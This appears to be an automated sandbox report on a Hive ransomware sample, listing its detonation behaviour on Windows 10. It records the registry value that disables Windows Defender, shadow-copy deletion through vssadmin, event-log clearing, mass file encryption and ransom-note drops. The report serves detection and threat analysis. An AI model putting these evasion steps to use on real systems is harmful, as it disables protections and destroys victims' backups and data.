Malware Analysis Report

2024-10-16 03:11

Sample ID 220112-vhc2csdddq
Target 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.7z
SHA256 ece6bccb64b3ea172b531008bdda7f24b0b28a193a67056a43689f852dfd9ddf
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ece6bccb64b3ea172b531008bdda7f24b0b28a193a67056a43689f852dfd9ddf

Threat Level: Known bad

The file 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Modifies security service

Deletes Windows Defender Definitions

Hive

Deletes shadow copies

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Launches sc.exe

Drops file in Program Files directory

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Runs net.exe

Suspicious use of WriteProcessMemory

Runs ping.exe

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 16:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 16:59

Reported

2022-01-12 16:59

Platform

win7-en-20211208

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 16:59

Reported

2022-01-12 17:04

Platform

win10-en-20211208

Max time kernel

163s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\SuspendGroup.raw => C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\InitializeRename.crw => C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\OptimizeRename.raw => C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff => C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\SelectDebug.raw => C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\DisableRepair.crw => C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\SyncAssert.tif => C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File renamed C:\Users\Admin\Pictures\CompareUninstall.png => C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardMSDNR_Retail-pl.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_CtuFolQ6xGE0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WXrcawFx_2Q0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\iotb_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WEhlYkzA8EM0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1h.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_cardback.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-48_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dkFSCA3qJmc0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WJ6r73KGnOM0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VpNJHtFK5Qk0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1250_20x20x32.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3009_32x32x32.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\resources.pri C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_M8AQ4flckP40.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\es-ES\ieinstal.exe.mui C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\FreeCell\Control_10.jpg C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ContemporaryPhotoAlbum.potx.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_KZWkpXKGsNk0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailBadge.scale-125.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reportabuse-default_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_UX1uN7dth3Q0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lt_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_ykmScO5HkiE0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\iotb_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_uTmkZukAU_Q0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Zha7z8wgPHI0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\iotb_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\iotb_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_J_em_jQ1DPM0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.dualsim2.surprise.small.scale-150.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_-GApP492Hv00.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\es-ES\TipTsf.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_QW4M2iW4_Ds0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.News\Assets\news_button_down.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Dark.scale-200.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_comment_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_lh994_VVNCk0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VxylmRYVR3g0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GB.XSL.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_kfXk-VELlvg0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FEsyvLrj3dk0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\iotb_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Grace-ul-oob.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_hxE_XqRD4HU0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Aquarium\mask\1h.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_yCiK8woPxW40.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorSmallTile.contrast-black_scale-200.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.scale-150.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dEDn0gCdCsI0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sl_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_I1aRWYAqGdk0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe\Assets\Office\settle.scale-140.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\time.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\PlayStore_icon.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_zTnuhdtL9LE0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\ado\msador28.tlb C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jZ0BdjJ05Eg0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-20.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.Background.winmd C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\WideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\It.snippets.ps1xml C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_MGg0nr6cMIs0.j2xnp C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

